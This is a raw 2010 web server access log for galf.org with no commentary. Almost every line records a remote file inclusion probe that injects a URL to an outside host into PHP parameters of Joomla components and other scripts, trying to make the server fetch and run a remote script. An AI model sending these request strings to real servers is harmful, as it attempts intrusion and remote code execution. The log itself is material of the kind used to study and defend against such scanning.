62.140.23.24 - - [14/Feb/2010:22:20:28 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:38 -0800] "GET /logs/access_100125.log/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [14/Feb/2010:22:20:50 -0800] "GET /logs//common/db!php?commonpath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [14/Feb/2010:22:20:50 -0800] "GET /common/db!php?commonpath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.72.86 - - [14/Feb/2010:22:20:50 -0800] "GET /logs/access_100125.log//common/db!php?commonpath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.13.69.245 - - [14/Feb/2010:22:20:55 -0800] "GET /logs/access_100125.log/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:22:11 -0800] "GET /appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:22:11 -0800] "GET /logs//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:22:11 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.250.198 - - [14/Feb/2010:22:22:37 -0800] "GET /logs/access.log//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.204.191 - - [14/Feb/2010:22:23:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:25:08 -0800] "GET /logs/access_100111.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:25:09 -0800] "GET /logs/access_100111.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:25:36 -0800] "GET /logs/access_090810.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:27:36 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:27:36 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:27:36 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:28:39 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:28:39 -0800] "GET /logs/access_100111.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:29:10 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:29:10 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:29:11 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:30:18 -0800] "GET /logs/access_090907.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:30:30 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:31:11 -0800] "GET /logs/access_090810.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:22:32:12 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:33:31 -0800] "GET /logs/access_100111.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [14/Feb/2010:22:34:19 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
213.239.230.130 - - [14/Feb/2010:22:34:19 -0800] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.achetersalvia.fr//modules/mod_poll/test.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:22:34:35 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:22:34:35 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:22:34:35 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:22:34:57 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:22:34:57 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:22:34:57 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:22:36:39 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:22:36:42 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:22:36:42 -0800] "GET /logs/access_090720.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:37:30 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:37:30 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:37:30 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:37:31 -0800] "GET /logs/access_100111.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:37:34 -0800] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:37:41 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:37:41 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:37:41 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:37:51 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:38:00 -0800] "GET /logs/access_091221.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:38:00 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:38:00 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:03 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:03 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:03 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:38:07 -0800] "GET /logs/access_091221.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:38:07 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:38:07 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:13 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:13 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:13 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:14 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:17 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:17 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:17 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:22 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:24 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:24 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:24 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:33 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:41 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [14/Feb/2010:22:38:42 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:39:30 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:39:30 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:39:30 -0800] "GET /logs/access_090803.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:40:16 -0800] "GET /logs/access_091221.log///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:40:16 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:40:16 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [14/Feb/2010:22:40:42 -0800] "GET /logs/access_100111.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [14/Feb/2010:22:40:43 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [14/Feb/2010:22:40:43 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:40:45 -0800] "GET /logs/access_091012.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [14/Feb/2010:22:41:16 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [14/Feb/2010:22:41:17 -0800] "GET /logs/access_100111.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [14/Feb/2010:22:41:17 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:41:26 -0800] "GET /logs/access_091221.log///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:41:26 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:41:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:22:41:27 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:41:43 -0800] "GET /logs/access_091102.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:42:05 -0800] "GET /logs/access_091102.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:42:26 -0800] "GET /logs/access_091102.log///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [14/Feb/2010:22:43:03 -0800] "GET /logs/access_091102.log///?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [14/Feb/2010:22:43:10 -0800] "GET /logs/access.log//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:22:43:46 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:22:43:46 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:22:43:46 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:46:37 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:46:37 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:46:37 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:48:02 -0800] "GET /logs/access.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [14/Feb/2010:22:48:08 -0800] "GET /logs/access_090810.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:48:32 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:48:32 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:48:32 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:49:14 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.6.218.57 - - [14/Feb/2010:22:49:14 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.6.218.57 - - [14/Feb/2010:22:49:14 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.6.218.57 - - [14/Feb/2010:22:50:30 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:50:30 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:50:30 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:50:40 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:50:40 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:50:40 -0800] "GET /logs/access_100201.log%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:50:49 -0800] "GET /logs/access_100125.log%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [14/Feb/2010:22:52:03 -0800] "GET /?mosConfig_absolute_path=' HTTP/1.1" 200 1048 "-" "libwww-perl/5.76" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:52:10 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:52:10 -0800] "GET /logs/access_100201.log%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:52:10 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [14/Feb/2010:22:52:18 -0800] "GET /logs/access_100125.log%20%20//bbs/kr_shop.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:22:52:55 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.15 - - [14/Feb/2010:22:53:24 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
